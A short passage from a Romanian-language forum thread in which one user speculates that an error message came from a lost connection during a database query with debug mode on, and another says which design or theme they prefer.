    mi-a fost frica sa incerc sa vad ce e sa nu stric stiu eu ce pe acolo.... banuiesc ca ar fi o atentionare ca a cazut netu in timp ce se executa un query in tabele O fi activat "debug"-ul...
  25. puskin
    imi place al lui codex in rest as inclina spre unul mai modern, tehnic..
×
×
  • Create New...